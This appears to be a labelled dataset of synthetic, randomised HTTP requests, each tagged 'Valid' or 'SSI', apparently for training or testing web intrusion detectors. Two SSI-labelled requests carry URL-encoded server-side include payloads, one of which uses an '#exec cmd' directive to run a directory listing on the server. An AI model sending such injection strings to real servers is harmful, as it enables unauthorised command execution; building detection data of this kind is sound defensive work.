Referer: http://www.wmjh.biz/x3maAn/0ile/uuYl8t/oafflae/ent8anos.jpg
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.2 (Machintosh; U; Mac OS X 2.5; eu-Ww; rv:7.1.3) Gecko/72310828
UA-CPU: MIPS
UA-Disp: 1257,262,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7281x9184
Via: ahlz/8.7 213.24.101.92:880, r8amlh/7.5 115.254.97.160
Transfer-Encoding: jhsatg; lghe=p9qse
Upgrade: 3ilhh/7.5, sclai/5.5, chnnyw/6.6, nlh/5.8, Fmk/0.2
Warning: 700 197.152.29.39 "nzsilin5" 
X-Forwarded-For: 7.28.176.57
X-Serial-Number: 3449007851195603
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 164
Start - Id: 9655
class: Valid
GET /pq8jtUbkN@g1sH/ehtop5lfEObCl/7R/ZIww8yi/ta4dcIh9-s/oTW4m-Q3dY85B24RonPW/l0swrk.x0.xjGmvGzn/nsoy3nCneevc8roeE/lHRr./ptmltpcmtoiit/0J8Yr8/hTr3p.aspx?ptidtidut=014&0lso7nf9Wia=532906&sce8sa=066140&U9V6s=s6cxyeP%25phtcn8to&qde=sgk2qnP6QMFj&2xelfrSv=%2B4ooega3Jdh0update%3Cd&les=2485&EmselectNGehGf0OS=fZ-&6c=omqedceRnmehizyehh&timhnlrnl=tocR&trwmeragtis=on1a2&isyicjWbtghgN=eliocnainput6lo&ZSaccess_log1XQab1ftp=tulfeeeobjectk+5t+&tawhsaeEA=nhd&QobjectILO-2cP=672 HTTP/1.0
Host: www.sd0Mi.uk
Connection: eheretds
Accept: */*;q=0.9
Accept-Charset: cp-950;q=0.6, isiri-3342, x-mac-turkish;q=0.3, macintosh;q=0.5, euc-tw
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 22.60.12.210
Cookie: phpttbeie=6-7pwSM6cu0C;teDnnaau=tqer5nevalnhwn9k;t9p2etlceree2ni=rVgRP;enlips8dt4rolo=o>boot.initmpU;exboeOtawes=g;sef=30131
Cookie2: $Version="68"
Date: Thu, 28 Jan 10 08:27:31 GMT
ETag: W/"mAp4wCl6gRr7GF74grcD"
Expect: 100-continue
From: ocaq@aau2fenea.fr
If-Modified-Since: Mon, 24 Sep 07 18:07:50 UTC
If-Unmodified-Since: Sat, 17 Feb 07 19:37:36 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 07 Aug 04 01:56:34 UTC
Max-Forwards: 82
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: ni3esO o9oc=rheoabn
Authorization: Basic d3RudDpydTNjZTU=
Range: 54-7853,-953,87-
Referer: http://www.mliiIuon.de/hEhn/nWnn2.sh
TE: trailers,trailers,deflate
Trailer: Accept-Encoding
User-Agent: etiM/7.4
UA-CPU: StrongARM
UA-Disp: 0833,784,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 7210x634
Via: 9.7 79.212.212.153:96866
Transfer-Encoding: gzip
Upgrade: sLskE/9.9, lm6o/6.1, toe1rq/3.0
Warning: 821 www.f4tipnoj.jpeg:21799 "pyfo4" 
X-Forwarded-For: 48.192.127.27
X-Serial-Number: 04486
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9655
Start - Id: 13217
class: Valid
GET /t9QkKwtDDvK0KT9F/fk9z@HW-31l6BXKVi.y.msf?hlhkRithg=tmplnCateaccess_log9enotoa%27l%7E&SXgFHFQHtid=%3Cwlr+var%26ngevarc&dihof6a=38093&soAfe=eUhHPPP02d9&area72iwke=8466&0o=188 HTTP/1.0
Host: www.deaeOc.uk
Connection: NBtfnee
Accept: video/mpeg;q=0.8, application/*, text/*;q=0.0
Accept-Charset: iso-8859-9;q=0.5, windows-1252;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: min-fresh=116
Client-ip: 159.69.232.141
Cookie: nhnheydiTdri=FEjc;aayshEa=oeeaeafyeno5hpti;DzunionUpsvprocessing-instructionKy=mcnuutMsciy9;V1I9k=giv9hmc;eECcUgd=13B
Cookie2: $Version="29"
Date: Mon, 26 Oct 09 11:01:54 GMT
ETag: "ZANmXnakMXp8cfOM7"
Expect: dIf3ftsh=cioiNli;Khkkl7n
From: mmi5dv@7cu5saas.com
If-Modified-Since: Mon, 20 Jul 09 20:28:57 GMT
If-Unmodified-Since: Wed, 22 Apr 09 17:08:56 UTC
If-Match: "aPcgQOtL0c97CVVfA"
If-None-Match: *
If-Range: Sat, 14 May 05 15:18:02 CET
Max-Forwards: 04
MIME-Version: 4.3
Pragma: h6la=yil4Ei
Proxy-Authorization: Basic ZWlkZDoyY3JidDRtYQ==
Authorization: toif 3raats=thbsthE
Range: 781398-
Referer: /hNatxer/mflip/4ay9sosu.jsp
TE: trailers
Trailer: Upgrade
User-Agent: feFFD-vv http://www.ehnUuE.ch
UA-CPU: Sparc
UA-Disp: 2503,069,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 3489x100
Via: 8.6 19.112.194.231, HTTP/7.5 222.72.226.95, iutra/1.3 www.of2md.css
Transfer-Encoding: oifr; dsehNnE=lcs3
Upgrade: tsts/0.5, eao/0.4, t6o/4.1, 2ibk/6.8, ihsqE/6.1
Warning: 250 6.79.0.164:77 "tiaaitulapnse9actS" 
X-Forwarded-For: 112.1.79.197
X-Serial-Number: 17158913018892
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13217
Start - Id: 34504
class: Valid
PUT /oIp8JyW48POgVNjR-/04omoeaog/XZ/e_2UaM6V/TbFJKhTa/z.clh/j2Kqs/nFr/dWS3XmaEUkO/wmrVvu4H.svBn0C/eatElItmo/sgwPLsDfstylew.exe? HTTP/1.1
Content-Length: 90
Content-Language: shn,entzDuh6
Content-Encoding: compress
Content-Location: /9ha5w/8dn6rl/i7ta/zdipai/igoe.fgf
Content-MD5: N21TNWNkZTFyWWdoNWxwbw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 07 Feb 08 17:03:52 CET
Last-Modified: Wed, 03 Jun 09 13:19:58 UTC
Host: www.itrBRdeumH.org
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: atoso-6opaxncm, aR-yiwrhs, rsS-tbe;q=0.8
Cache-Control: min-fresh=3
Client-ip: 96.49.197.35
Cookie: fdiilps=nL4;CpvgPFA4D=w8JW.Jb;m-Du7j=itt8alspethshiij;ENAfh=(hxb0;oMgeni=dnw6et;D2r=511122463
Cookie2: $Version="082"
Date: Fri, 24 Aug 07 17:22:12 GMT
ETag: W/"zXkqap1UykJ3qZ_m7Y"
Expect: ndneT1nR=tcnasehS
From: doesa@0psfre.gov
If-Modified-Since: Thu, 29 Jan 09 01:37:39 CET
If-Unmodified-Since: Sun, 25 Nov 07 21:24:17 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 22 Dec 09 07:03:44 UTC
Max-Forwards: 04
MIME-Version: 1.0
Pragma: Edea=suJnsT
Proxy-Authorization: Basic b21laDd0Omhoa28=
Authorization: Basic T2lXb3JucnQ6ZWFlbg==
Range: -10,976-,-186
Referer: http://sOccii.gov/anr99t/lnaZna.exe
TE: chunked
Trailer: Warning
User-Agent: seasrcwluS (eq@IK-; o9afbQNor; ariRGgXcu; iBllaiCdsy)
UA-CPU: MIPS
UA-Disp: 3627,6324,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 7089x0052
Via: 0.8 118.166.57.117:99, 6.2 www.n8couee.js, n0mZ/3.4 148.17.231.110
Transfer-Encoding: deflate
Upgrade: rom/3.2, dam9/0.8, 7tem/6.5, z0g/8.9, amnc/6.5
Warning: 499 24.172.147.164 "idoo6ex7lm" "Fri, 25 Mar 05 19:19:41 CET"
X-Forwarded-For: 94.124.42.230
X-Serial-Number: 16107825761
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

s6ze6odRuenT=e)s/t&jCch1paoSjKr=eXvM&oendes7g=h1tAslilsezVdTi&ddotiea4cita=4bcfcNm3uEy

End - Id: 34504
Start - Id: 26907
class: Valid
GET /aosilvcaieaigy/sb/vyyWmRWyJqOrstdinY/jueh/ogewysIe0ieByr/wn@oO4DM_rdBpE/txmaaruMoahtq/DAh7tjUXwget_/oq.php4?Pu=2062283&r2enMzuihniO1ls=752&z1eXr34ef=1630968&rtapcr7lnano=iefiGeRS4o&ch=14651&j-chttpsz6Mn=lfH+utbodyononI&vRqApddJ=8222&slrhi8=toxQrz05T0k&1ediaSaicnb7v=%28%5Doei HTTP/1.1
Host: 185.94.97.60:80
Connection: 2onc
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: compress, deflate;q=0.4, compress;q=0.7, identity, compress;q=0.3
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 187.70.10.21
Cookie: hs=lltsef;OexMcnm3id=0633324859;sdyeedod=sebia
Cookie2: $Version="52"
Date: Tue, 14 Jun 05 23:45:01 CET
ETag: "5_JedyMT5Ej0gYQ_"
Expect: 100-continue
From: clW7Lgm@txs4tae.gov
If-Modified-Since: Fri, 30 Jul 04 09:43:32 CET
If-Unmodified-Since: Fri, 02 Apr 04 06:08:07 GMT
If-Match: "9TdE8O8wX7GkCo2dFZ"
If-None-Match: *
If-Range: *
Max-Forwards: 25
MIME-Version: 6.0
Pragma: sgeqspe=5qspt5tt
Proxy-Authorization: NTLM OGVhMHRlbXNpRTVkYkxydWVlaWNoSW43VWFvdTllbkxUZG9lb24=
Authorization: Digest algorithm=MD5-sess
Range: 0-,7-80207
Referer: http://www.srtdy.gov/exts.mp3
TE: trailers,trailers,deflate;q=0.8
Trailer: Accept-Language
User-Agent: Mozilla/1.7 (Machintosh; U; Mac OS X 5.5; ao-y6; rv:0.5.4) Gecko/09375235
UA-CPU: Sparc
UA-Disp: 0480,6767,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0290x1154
Via: 2.9 www.tToaeo.jpeg:7
Transfer-Encoding: compress
Upgrade: 0Hdp/7.3, nXu/9.2, blie/9.3
Warning: 785 139.199.253.164:9 "stduoo4mei" "Wed, 12 Dec 07 02:11:19 CET"
X-Forwarded-For: 31.91.23.195
X-Serial-Number: 781010344531
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26907
Start - Id: 478
class: Valid
GET /d7X54v-pu8pgvcDeXE0Z/zOhtteaeiimplF.sh?oxhaatE65hiia=Eb+&aili=177&e0eesnindatcti=1084&tnttislui09=optsrrul%3D2n&cxyI8aEca5rp=172&hni6nqathtTgk=71980&fr=ggimgyp%3Bhs%28+vbscriptnhae&nhh2tea5nutmse=0.6n&xtcgg9=5402922250&eeeTaindc=9IgMt198N&Q6YBBv=fdoh HTTP/1.1
Host: 97.118.109.21
Connection: keep-alive
Accept: application/*;q=0.6, video/*
Accept-Charset: iso-8859-7, hz-gb-2312;q=0.8, us-ascii;q=0.2
Accept-Encoding: *;q=0.7
Accept-Language: uor2vYia-sww3qASs;q=0.8
Cache-Control: max-age=47
Client-ip: 140.180.57.47
Cookie: bechteasbrwa4=te;qIsxae5s=crs;atoadn6jp=exelmaM5h2ied
Cookie2: $Version="3"
Date: Sat, 03 Feb 07 21:30:36 GMT
ETag: "cdDik-72V6QG9lrV"
Expect: 9eenr=qiMlasE
From: 0mojo@hf1oov.st
If-Modified-Since: Thu, 10 Nov 05 02:16:52 UTC
If-Unmodified-Since: Sun, 19 Jul 09 04:04:39 CET
If-Match: "PTSWRFxl406MFMllg37s"
If-None-Match: *
If-Range: Sun, 31 Jan 10 09:50:24 CET
Max-Forwards: 293
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: NTLM aG5pRmhlbmhyYXNsSTF5dGNhZXlvaXJybmVvZDkzcklpaWg5cG90YVNlbA==
Authorization: Basic VG92b2IyYjphU2VB
Range: -0193,67-,55248-036771
Referer: /diio/ogphgrbA/sa2pc/tk3voae/50oroc.msf
TE: chunked;q=0.5,trailers,deflate;q=0.6
Trailer: Accept
User-Agent: c7gnct1d/0.0
UA-CPU: StrongARM
UA-Disp: 506,620,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7413x7082
Via: 0.5 213.163.30.62:6108
Transfer-Encoding: deflate
Upgrade: fOhwz/1.0, oniv/8.1, s3fenz/6.5
Warning: 976 148.134.175.140 "ftiyhn7Flr5m" "Sun, 28 Feb 10 03:59:16 CET"
X-Forwarded-For: 81.35.162.33
X-Serial-Number: 9170010950
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 478
Start - Id: 11822
class: Valid
GET /Eitcadltaaeld/ona/fKAhikSmcaaerte/eV/iprZiyAYgHT51th/t9.gif?iXa6nLjutgwtrns=ik%26p%27Ind&neEzs7wihbO=%7Ee&eieOtus=mzeesnme5ryhhr HTTP/1.0
Host: www.n7oacsp.gov
Connection: keep-alive
Accept: */*
Accept-Charset: euc-cn;q=0.1
Accept-Encoding: gzip;q=0.4, compress, compress
Accept-Language: wews-Ama4ionq
Cache-Control: max-age=3
Client-ip: 54.230.57.109
Cookie: documentQrZnph-9fIo=thev;0btohiyrlssdmxT=o.ms1jKyXA;eUeef4=42283;Esyrh=e4Ny2dJ
Cookie2: $Version="863"
Date: Tue, 27 Sep 05 15:50:09 GMT
ETag: "m17lYPb@0k3@X_D"
Expect: 100-continue
From: ltia@luxm.fr
If-Modified-Since: Mon, 21 Nov 05 01:51:03 UTC
If-Unmodified-Since: Mon, 13 Aug 07 06:55:00 CET
If-Match: *
If-None-Match: "zDP.RPE4HHIbI.0"
If-Range: *
Max-Forwards: 2271
MIME-Version: 9.7
Pragma: d=hr
Proxy-Authorization: NTLM cndlYVQ0cmVvbnZyZWxyaW50dHRhaXJ0dGx2bnNhb21iaQ==
Authorization: NTLM bmVvZGVsRXNkdHZtVHFnaUF0c3ZOdHRibm1mczlJc3NvMU9jTWVzTmlZaHZlc28=
Range: 59-860239,22-,-9
Referer: /hteOs/hlhtdm/nufr9man/MD7R.tar.gz
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: i8sns (cUxdGV7bc; eAcCtbvm; s9cYp0; iv8uyZlhb.)
UA-CPU: x86
UA-Disp: 032,592,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 045x0190
Via: nrTdHe/8.3 246.40.207.235, 0.7 www.9aopn.htm, FTP/4.3 www.6ctt.html
Transfer-Encoding: deflate
Upgrade: ptl/3.8, ewttf/4.6, ywn/8.3
Warning: 125 www.knwtlae.shtml "ad0et9kU3d4n6SuMdtN" "Thu, 30 Sep 04 09:26:08 GMT"
X-Forwarded-For: 154.0.65.175
X-Serial-Number: 63208652767395
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 11822
Start - Id: 4717
class: Valid
PUT /siihsrbbIthbE7rco3o/rSQCKSLiCjDtfSTYo2J.asp? HTTP/1.0
Content-Length: 117
Content-Language: phovfNi,zhe8
Content-Encoding: gzip
Content-Location: /lnaisIaa/2aye/ngds/essi.aspx
Content-MD5: b29hbjJlaWN5eTRFZWVzYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 31 Jul 05 24:47:05 GMT
Last-Modified: Tue, 19 Feb 08 04:24:23 GMT
Host: www.tfboisbh.com:80
Connection: close
Accept: video/*;q=0.9, image/png;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 46.178.44.105
Cookie: qXtklhZuM=edD5tbotem1T;gaocnnw=i1fZo
Cookie2: $Version="7"
Date: Mon, 25 Oct 04 10:31:24 UTC
ETag: W/"VyJdBW_j39y7gy@nVHjI"
Expect: iokxesrg
From: pmneeca@slr7xi.cz
If-Modified-Since: Tue, 03 Oct 06 22:36:53 GMT
If-Unmodified-Since: Tue, 03 Feb 04 19:40:05 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 11 Mar 04 02:26:17 UTC
Max-Forwards: 625
MIME-Version: 1.4
Pragma: tjTihs7=Ihdti
Proxy-Authorization: wshe kryo=t4krnTk
Authorization: wl0e yeswth71=eofdroi
Range: 22-2,-49
Referer: /kfi0iTfa/oee9/syul/9nuO/dxmy.bin
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/4.8 (X11; U; Unix 9.5; es-Qt; rv:5.9.1) Gecko/29687863
UA-CPU: Sparc
UA-Disp: 759,838,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 868x5971
Via: 1.7 1.33.134.93
Transfer-Encoding: compress
Upgrade: gto1/9.1, noos/2.9, su2trm/7.6, u0Ntk/3.5
Warning: 097 www.nireajto.jpeg "egeNTsmuczf3" "Wed, 07 Jun 06 23:53:54 UTC"
X-Forwarded-For: 112.130.112.55
X-Serial-Number: 88567047734
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

6esqcaea1=out9yr=dDtjeaccess_log&ctrtE=ymCG7KaqzA5&OLsftb=036&execORmDH=tteehUfomio&Nanftgmmyf=8307&tionm0et=471589

End - Id: 4717
Start - Id: 40042
class: SSI
GET /qxMAs5CnTV7B/8lOsa/Hemah/duke2ZaycVPqsLz7uk.u.pl?tbRRn3tuoTsheIw=rle%3Et&nexa12fnCa4=e-yjeVE9l6&xnshyaarsrr=%3C%21--+++++%23exec+++++cmd%3D%22%2Fbin%2Fls++++-l++%2Fhome%2Feta%2Fisa8noo%22++--%3E&n928nEmeterc=s+senes%27stbn&fR0=siHYjhze3AkO&4SaMnS=06637&7ytf6e=ezU0wReOH5&uaa=h2O&HIpeV_kM1having=iiomh%5Cscriptwp-ae%3De%24or&1SaUmochaxWTw=11&Qi5LinKselectu9Ms=%5Di&shutdownjnWa_P7dAP2=99576922 HTTP/1.0
Host: www.syphEZmrto.biz
Connection: grOte
Accept: */*
Accept-Charset: x-mac-japanese
Accept-Encoding: compress, gzip, deflate;q=0.1, deflate, compress
Accept-Language: Tnie0qgq-edeEe4, nirhhRyh-iE;q=0.8, ntza-nt, lh5anta-tibess;q=0.3
Cache-Control: max-age=07
Client-ip: 175.76.182.91
Cookie: nnootrdztsbynMM=8416739662;fnE_sK_Qpe=tS]nigietttl
Cookie2: $Version="7"
Date: Wed, 09 May 07 01:28:48 UTC
ETag: "xJcfFu.TQv6CMJdq7b"
Expect: 100-continue
From: loaa@ioendeSshb.it
If-Modified-Since: Mon, 27 Apr 09 09:25:55 UTC
If-Unmodified-Since: Thu, 25 Oct 07 19:23:18 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 04 Sep 08 10:03:53 UTC
Max-Forwards: 402
MIME-Version: 7.2
Pragma: botele3y='v'
Proxy-Authorization: Basic ZmhsdDp1YWx0ZQ==
Authorization: NTLM ajBnZW1kdHRvdW1hYXIxcmFpcGlvYmZPU2NuNnBldHQyMnV5RW9lYTVSbm9yaTN0
Range: 04250-19296
Referer: http://rkll.biz/Z6Anjut/Muha8/eiel7PPs.mdb
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/2.6 (compatible; MSIE 7.8; Mac OS X; 3Uaieieer)
UA-CPU: MIPS
UA-Disp: 704,609,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5394x1347
Via: 3.0 www.aUne.jpeg:1310
Transfer-Encoding: cndi6z; atsbsr9h=kaesyeLg
Upgrade: sonW0n/7.4, iecird/0.5, sihan/2.9
Warning: 794 212.70.161.46 "nC7teHarp0di5fna" 
X-Forwarded-For: 117.150.72.121
X-Serial-Number: 02001
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40042
Start - Id: 9138
class: Valid
GET /syGpT0ue8w/hbyEVUS6Z4J4Z3/9UmkqdvwIJ4z_kA/1access_logy/hsced5nl30o/sN1t/sYAMiTns3pe/c4tboo.html?eiheeh=4&chl=rttayeifrlheK6racr&YJa9LMX2R=tt%3Amr&cInlronifiSep=0961&ndxsNtn2lo4oiOn=07&nnhuirogtcb=ea1aa&-krlqG3MjwPI=ofi&ouarbetitvw=ecn&pI=0049965&at=5120040953&sK89=32781712 HTTP/1.1
Host: 176.165.55.250
Connection: close
Accept: audio/*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=42233
Client-ip: 101.101.207.193
Cookie: ihln9uizt1=xhdtooipQ
Cookie2: $Version="69"
Date: Wed, 15 Apr 09 02:35:08 GMT
ETag: W/"Olimrl8N8EDcthct"
Expect: 100-continue
From: ctaMmsso@ernuTGi.biz
If-Modified-Since: Fri, 09 Nov 07 24:28:16 CET
If-Unmodified-Since: Mon, 25 Aug 08 02:01:16 UTC
If-Match: *
If-None-Match: "1lFm1aRv85vuRTPC4"
If-Range: Sun, 21 Jan 07 07:44:31 CET
Max-Forwards: 3
MIME-Version: 9.1
Pragma: ld='ihiq0so4'
Proxy-Authorization: Digest qop=fe4a
Authorization: Digest username="1rmyafy"
Range: -8237
Referer: /rJEedl/i3Nt/yEsoaeme/luyhy.php3
TE: gzip;q=0.2,gzip
Trailer: Accept-Charset
User-Agent: Mozilla/1.3 (X11; U; Solaris 0.4; rd-ir; rv:1.8.4) Gecko/76211964
UA-CPU: MIPS
UA-Disp: 419,947,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 0794x264
Via: 1.8 163.155.96.124:60930, 7.3 www.sssgv.tiff:5, tSec/2.4 157.175.69.95
Transfer-Encoding: compress
Upgrade: mapEt/8.1, RNae/5.1
Warning: 136 255.90.245.205 "aYBe5ugoa7It7" 
X-Forwarded-For: 177.251.149.163
X-Serial-Number: 688483710117371
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 9138
Start - Id: 6729
class: Valid
POST /HPHeL74s3/ij/W8BH4IfK/PeftpMTNAopt/atXalOvtessEri3e/tn3w9faa4a/tse1kr5tug2s/sAZO/ghaaleXnAdaADczw/ct5fsedpmexee/wEfeloHcum/zXpassthruwCj7uB6deleteei.jsp? HTTP/1.1
Content-Length: 39
Content-Language: u,n7
Content-Encoding: identity
Content-Location: /tteoESt/wtzi2it/rErhha7/iUeh/utthllt.jsp
Content-MD5: T3VyYW5kY2JTcXU0c29SZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 25 Jun 06 19:29:33 GMT
Last-Modified: Mon, 26 Dec 05 07:00:16 CET
Host: 191.21.193.52
Connection: 9nis
Accept: text/plain, video/quicktime;q=0.2
Accept-Charset: *
Accept-Encoding: compress, gzip;q=0.8
Accept-Language: aeaeRnh-arwr, Gdid-cs1srdsa, iatrse-h8Wn3n, hzE-dgItu2;q=0.0
Cache-Control: only-if-cached
Client-ip: 172.156.250.162
Cookie: er4E=20693
Cookie2: $Version="46"
Date: Mon, 23 Feb 04 05:45:40 GMT
ETag: W/"oBmHbSaKdm6RPnPO"
Expect: 100-continue
From: uo9blte@Ic9o.com
If-Modified-Since: Mon, 07 May 07 08:19:08 UTC
If-Unmodified-Since: Sat, 12 Sep 09 18:46:28 CET
If-Match: *
If-None-Match: "ObNTM4FBRBIWjZbCxi"
If-Range: Sun, 24 May 09 04:00:56 GMT
Max-Forwards: 7798
MIME-Version: 7.6
Pragma: oome=eifng
Proxy-Authorization: ditntt orh2ym=aefw
Authorization: NTLM NXp0blNyaXoxc29ud3J0YXZjZ3d0dmRoMnNyZW51aGVjeXJuNGRuY3lkbA==
Range: 38-1,16854-
Referer: /8l3lmtq/gaaae/puhg/ssoigtrl/ie3ctfI.mdb
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: Hhmn19tei/4.6.7.1.5
UA-CPU: Sparc
UA-Disp: 053,477,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 2276x763
Via: HTTP/3.1 www.nr0e.htm
Transfer-Encoding: identity
Upgrade: zp6/4.2, Ioh/9.1
Warning: 762 www.hneaRc.tiff "02uia6th8ugpn" 
X-Forwarded-For: 6.218.56.206
X-Serial-Number: 0215264637366024
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~

27=lnetcatf6'lueu&tbLlyhs=O&traz=0872

End - Id: 6729
Start - Id: 39232
class: SSI
GET /4RhtUKFMFi8I/e6igeinoxe5grldror7/nO7EOkJYUwmK@/yIL4zV7YChCxK7/83easeel3/rNG2b_C/xBQTvKAqgUPDAc0_f2u/oLM1G9/i40wp@a2G3pbcB5Vj3h/7KX/bmlboqrneMscyg4.png?h4e8hbf=rGpC06UQ&ysa7aeY64oeds=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&5sUOWlogQI=hcknph-ra+&ietlarthbrbt=26017207&aph5aPdsutais=e%3Cn+r0dlaHsm HTTP/1.1
Host: 176.40.230.63:05
Connection: close
Accept: text/*, video/quicktime, video/*;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 115.187.210.122
Cookie: aspaqs7lOloevmo=qre7estat;aiJ11=3Q_O@fZ
Cookie2: $Version="798"
Date: Mon, 20 Feb 06 14:00:21 UTC
ETag: "4WITdI0tQXVWOMUbkat"
Expect: 100-continue
From: lyrtrai@3atnetodh4.net
If-Modified-Since: Sat, 29 Nov 08 05:31:30 CET
If-Unmodified-Since: Tue, 05 Jun 07 14:37:29 GMT
If-Match: *
If-None-Match: *
If-Range: "6-4buPdj1OH4uxYKc-"
Max-Forwards: 1
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic c2ltMjpzYWdlYjVhYQ==
Authorization: tnehsR oeivpo=oehots
Range: 5-9725,-6683
Referer: /o6bittc/sTsrMan.doc
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
User-Agent: hmttoFelhotfsen
UA-CPU: 68000
UA-Disp: 274,6270,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 833x510
Via: FTP/2.2 16.63.157.216, 8.9 www.e6npee.js
Transfer-Encoding: compress
Upgrade: sjrtoN/2.4, ytwq/5.4, RmLke/9.3, citRri/1.2
Warning: 173 103.13.38.123 "ncwbefh" "Tue, 25 Oct 05 02:27:19 UTC"
X-Forwarded-For: 252.9.253.184
----: ---------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 39232
Start - Id: 3142
class: Valid
GET /tosm1T3/notxa/Z3ynssr/etiornltr4j/8x/5NZ/nxmsB2cOf/n1GNMJugSDaiNWqX/iactrPLa6iu9C.shtml?nTsta5=49&AMxHwJoptKJs=tKa.Yb5k&3tzzN=tykmstsiiuld1&4OandS_VY6ai=ligy%2Fhmat5z07m%27+5&hnsrisIcsrygrr=t8fen3AZ0JjN HTTP/1.0
Host: 154.210.226.104:80
Connection: close
Accept: image/*;q=0.8, audio/basic;q=0.1, video/quicktime
Accept-Charset: euc-tw;q=0.2, x-mac-cyrillic;q=0.9, x-mac-greek;q=0.4, iso-8859-4;q=0.4, iso-8859-1;q=0.4
Accept-Encoding: 
Accept-Language: t-575fyste;q=0.1, tgKe-6ssic
Cache-Control: max-stale=8
Client-ip: 179.176.204.119
Cookie: h8otmqe=;oi;phpzrw8gE=(ksc/niaej ;.D2pOjt=82311827;vltiframeXS=50
Cookie2: $Version="69"
Date: Wed, 07 Jan 04 07:51:09 UTC
ETag: "-AJ3BvKDQiLoGn3w"
Expect: 100-continue
From: dr3e@eJNrt.cz
If-Modified-Since: Tue, 24 Feb 09 11:56:31 CET
If-Unmodified-Since: Mon, 01 May 06 13:13:45 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 29 Jan 07 05:20:29 CET
Max-Forwards: 049
MIME-Version: 7.8
Pragma: u7=a2uhz
Proxy-Authorization: soe8zt sjRmiek=rtuiiair
Authorization: NTLM cmFyYWVyRWRldGxhYmgzb0poZWlrclRlaHpuYXhpZ3IyaW9paWVIZWR0
Range: -33546
Referer: /odo2Us/areaNh/Eanade.jpeg
TE: trailers
Trailer: Transfer-Encoding
User-Agent: hQTNy9lj http://www.au5a.de
UA-CPU: PowerPC
UA-Disp: 245,4881,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5717x5114
Via: 5.7 86.102.251.245
Transfer-Encoding: identity
Upgrade: da2wHl/3.4, ndo/3.7, pReoct/8.9, s4knn1/0.1
Warning: 446 www.fikne.html "nqbsbldmuEl1E71nq1" 
X-Forwarded-For: 54.64.220.207
X-Serial-Number: 545829621
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3142
Start - Id: 17026
class: Valid
GET /uV5j/armHCoC/slTBJ1Q.0spCIu/sf4leNel/ri9zy@N5f/noT-BwEwdKWKv@/scriptinsertORFZF.ap4ZnullB.php4? HTTP/1.1
Host: 75.132.41.155:80
Connection: ooa2o
Accept: text/xml
Accept-Charset: *
Accept-Encoding: 
Accept-Language: dhspeuan-enu
Cache-Control: only-if-cached
Client-ip: 28.189.114.107
Cookie: rcKimamls7=e?eeKhnhtaccesq?;iq=442321;ee4rlstia=706070824;evsrrepntOcnte=z1 =bs8?eum
Cookie2: $Version="7"
Date: Thu, 30 Apr 09 01:59:49 GMT
ETag: "A.ZS.4O2iFEzeW3cA6L"
Expect: 100-continue
From: scaa@elSiaj.biz
If-Modified-Since: Fri, 31 Mar 06 01:12:58 GMT
If-Unmodified-Since: Fri, 17 Apr 09 20:20:15 UTC
If-Match: "d_FfbvrMZHniE8t"
If-None-Match: *
If-Range: Sat, 19 May 07 12:23:01 UTC
Max-Forwards: 22
MIME-Version: 3.6
